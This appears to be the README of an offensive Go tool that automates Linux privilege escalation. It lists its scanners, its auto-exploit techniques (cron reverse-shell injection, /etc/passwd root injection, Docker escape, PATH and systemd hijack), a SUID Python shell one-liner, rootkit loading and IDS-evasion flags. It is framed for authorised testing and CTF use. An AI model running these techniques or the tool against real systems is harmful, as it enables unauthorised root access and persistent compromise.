⚠️ Ethical Warning

This tool is designed for authorized security testing, CTF competitions, and educational purposes only.

• Only use on systems you own or have explicit written permission to test
• Misuse may violate local and international laws
• The author is not responsible for any damage caused by misuse

You have been warned.

---

🚀 Overview

Rise-Privilege is an automated Linux privilege escalation suite that scans a target system, identifies misconfigurations, and automatically exploits them to gain root access — all in a single, statically-linked Go binary with zero dependencies.

Phase	Action	Description
1. SCAN	Passive discovery	10+ vulnerability scanners probe the system (read-only)
2. ENUMERATE	Find → Exploit mapping	Matches findings against 60+ GTFOBins database
3. EXPLOIT	Auto-root	Executes safest → most aggressive vector until root

---

🔢 Features

10+ Vulnerability Scanners

#	Scanner	Detection	Risk
1	SUID Binaries	Scans 10+ directories for SUID bit	Low
2	Sudo Misconfig	Parses sudo -l, finds NOPASSWD entries	Low
3	Writable Cron	Checks cron dirs & referenced scripts (world-writable)	Medium
4	Docker Breakout	Detects docker group membership, suggests escape	High
5	Capabilities	Reads /proc/self/status, finds cap_setuid/cap_sys_ptrace	Medium
6	NFS no_root_squash	Parses /etc/exports, finds exploitable exports	High
7	Writable PATH	Checks PATH directories for world-writable locations	Low
8	Systemd Services	Scans /etc/systemd/system for writable service files	Medium
9	/etc/passwd	Checks if world-writable, injects root user	Critical
10	/etc/shadow	Checks readability, cracks root hash	Critical
11	Kernel Info	Grabs kernel version, flags known CVEs (6 CVEs: PwnKit, Baron Samedit, PolaKit, StackRot, nf_tables UAF, packet socket UAF)	Medium
12	Writable Scripts	Detects world-writable shell scripts in cron/systemd	Medium

Escalation Techniques

Technique	How It Works	Auto-Exploit	Risk
SUID GTFOBins	Spawn privileged shell via SUID binary (e.g., python -c 'import os; os.execl("/bin/sh", "sh")')	✅	🟢 SAFE
Sudo NOPASSWD	sudo via GTFOBins without password	✅	🟢 SAFE
Cron Injection	Overwrite writable cron script with reverse shell	✅	🟡 LOW
Docker Escape	docker run -v /:/mnt --privileged	✅	🟡 MEDIUM
Capabilities	cap_setuid+ep binary → setuid(0)	✅	🟡 MEDIUM
NFS no_root_squash	Mount export as root, write SUID binary	✅	🟡 MEDIUM
passwd Injection	Append root user with known hash	✅	🔴 HIGH
shadow Cracking	Read hash → muestra hash root para crackear offline	⚠️ Detect + show	🔴 HIGH
PATH Hijack	Place malicious binary in writable PATH dir	✅	🟡 MEDIUM
Systemd Hijack	Replace writable service ExecStart with payload	✅	🟡 MEDIUM

---

📦 Quick Start

Installation

# Option A: Go install (requires Go 1.26+)
go install github.com/Ruby570bocadito/Rise-Privilege@latest

# Option B: Git clone & build
git clone https://github.com/Ruby570bocadito/Rise-Privilege.git
cd Rise-Privilege
go build -o Rise-Privilege .

# Option C: Download pre-built binary from Releases

Basic Usage

# Scan only (safe, read-only)
./Rise-Privilege

# Auto-exploit found vectors
./Rise-Privilege --exploit

# Auto-exploit with risk limit
./Rise-Privilege --exploit --risk=medium

# Specific vectors only
./Rise-Privilege --vector=suid,sudo,cron

# JSON output for automation
./Rise-Privilege --json

# Quiet mode (exit code: 0=root, 1=fail)
./Rise-Privilege --quiet

---

🧠 Architecture

flowchart LR
    A["🎯 Target System"] --> B["🔍 Scanner Engine"]
    B --> C["10+ Checks<br/>SUID · Sudo · Cron<br/>Docker · NFS · PATH"]
    C --> D{"Vulnerability<br/>Detected?"}
    D -->|"❌ No"| E["Report Findings"]
    D -->|"✅ Yes"| F["GTFOBins Matcher<br/>60+ Binaries"]
    F --> G["Risk Evaluator"]
    G --> H["🟢 SAFE"] --> K["Auto-Exploit"]
    G --> I["🟡 MEDIUM"] --> K
    G --> J["🔴 HIGH/DANGER"] --> K
    K --> L["💀 Root Shell<br/>or SUID Binary"]

Loading

File Structure

Rise-Privilege/
├── main.go                 CLI entry + orchestration
├── scanner.go              10+ vulnerability scanners
├── enumerate.go            Findings → exploit vector mapping
├── exploit.go              Exploitation engine (safe→danger)
├── gtfobins.go             Embedded GTFOBins database (~60 binaries)
├── gtfobins_update.go      GTFOBins updater from upstream
├── logger.go               Logging and output formatting
├── universe.go             Types, constants, formatting
├── peekaboo_test.go        Unit tests (9 tests)
├── docker/
│   ├── Dockerfile.vulnerable    Target with 10 deliberate flaws
│   ├── Dockerfile.clean         Secure baseline system
│   ├── Dockerfile.edgecases     Edge case scenarios
│   ├── docker-compose.yml       Test network
│   └── test_runner.sh           Automated test runner
└── README.md

---

🐳 Docker Testing

# Build all images
cd docker
docker compose build

# Start test network (vulnerable + clean + edgecases)
docker compose up -d

# Run Rise-Privilege on vulnerable target
docker exec peekaboo-vulnerable ./Rise-Privilege --exploit

# Run on clean system (should find minimal vectors)
docker exec peekaboo-clean ./Rise-Privilege

# Run edge case scenarios
docker exec peekaboo-edgecases ./Rise-Privilege --vector=sudo

# Full test suite
./docker/test_runner.sh

---

🎯 GTFOBins Database

60+ binaries with exploitation commands, embedded in the binary. Zero network calls at runtime. Works air-gapped.

Click to expand — all supported binaries

Shell interpreters (SUID): python, python2, python3, python3.8-3.13, perl, perl5, php, php5-8.2, ruby, ruby2-3, lua, lua5.3-5.4, node, nodejs, bash, dash, zsh, ksh, fish, sh

Sudo-capable binaries: find, vim, vi, less, more, man, awk, gawk, nawk, sed, gdb, nmap, tcpdump, tar, zip, unzip, rsync, scp, socat, env, nice, timeout, stdbuf, watch, make, pip, pip3, npm, gem, git, ssh, docker, lxc, apache2, cpan, ed, ex, ftp, wall, systemctl, journalctl, mysql, psql, sqlite3

---

⚡ All Commands

Command	Description
./Rise-Privilege	Scan only (no exploit)
./Rise-Privilege --exploit	Auto-exploit safest vector first
./Rise-Privilege --exploit --risk=safe	Only SAFE risk vectors
./Rise-Privilege --exploit --risk=danger	Everything (including dangerous)
./Rise-Privilege --vector=suid,sudo,cron	Specific vectors only
./Rise-Privilege --exploit --one-shot	Stop after first success
./Rise-Privilege --json	Machine-readable JSON output
./Rise-Privilege --quiet	Exit code only (0=root, 1=fail)
./Rise-Privilege --rooteame ./rootkit.ko	Load rootkit on success
./Rise-Privilege --stealth	Slow scan (evades IDS)
./Rise-Privilege --dry-run	Scan & enumerate only, no exploitation
./Rise-Privilege --update-gtfobins	Update embedded GTFOBins database
./Rise-Privilege --lhost 10.0.0.1	Set listener IP for reverse shells
./Rise-Privilege --lport 4444	Set listener port for reverse shells
./Rise-Privilege --log json	JSON log format (default: text)

---

📊 Risk Levels

Level	Examples	Auto-Exploit?	FS Changes?
🟢 SAFE	python SUID → shell	✅ Yes	No
🟡 LOW	find SUID, awk sudo	✅ Yes	Minor
🟠 MEDIUM	cap_sys_ptrace, cron inject	⚠️ Optional	May trigger alerts
🔴 HIGH	passwd injection, cron, docker	⚠️ Optional	Yes
💀 DANGER	shadow overwrite, kernel exploits	✋ Manual only	Yes, may crash

---

<sub>Built with ❤️ by Ruby570bocadito
Formerly known as Peekaboo — Now Rise-Privilege



© 2026 Ruby570bocadito. MIT License.</sub>